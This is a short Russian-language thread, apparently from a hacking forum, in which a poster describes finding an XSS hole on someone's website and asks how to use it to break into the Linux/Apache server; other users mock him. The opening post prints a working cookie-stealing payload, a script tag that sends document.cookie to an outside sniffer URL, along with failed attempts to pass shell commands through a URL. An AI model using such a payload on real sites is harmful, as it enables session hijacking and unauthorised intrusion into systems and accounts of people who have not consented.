Зашол в тупик при взломе
 

У меня тут такая проблема нашол сайт где можно произвести атаку с JavaScript я вставляю javas code
типа <script>document.location='http://antichat.org/s/sniff.gif?'+document.cookie</script>

Оно отсылает cookies на мой сниффер даже когда я просматриваю ту страничку куда я вставил код там есть мой java script code но оно там не сохраняеться т.е после второго захода кода нет я так понял оно через cookies xss работает.. вот пытался сдеать еще
так
<script>document.location='http://myname.narod.ru/get.txt&c=ls%20-l'</script> мне потом пишет что страница не найдена 404. делаю я без линукс каманд
<script>document.location='http://myname.narod.ru/get.txt</script>
выполнякм мой код тоесть в фрейме нажимаю source html вижу свой get.txt так же и с gif файлами...
Так вот что можно замутить с такой штукой стоит Lnix и apache помойму все на perl так вот нужо пробраться еа сервер я так понял только через cookie подделывать и все..? просто я не супер спец в этих делах но так получилось надо очень..

Я так давно не смеялся))) ГениЙ!))

Автор, читай здесь.
http://forum.antichat.ru/threadedpos...tml#post160263

Там с ошибками, но хоть человек знает, что делать.

Я плакалЪ...

Понятно значит у меня пасивная Xss атака только на момент сессии )) При обновление все по местам и не каких Xss гг))) А жаль такой сайтик....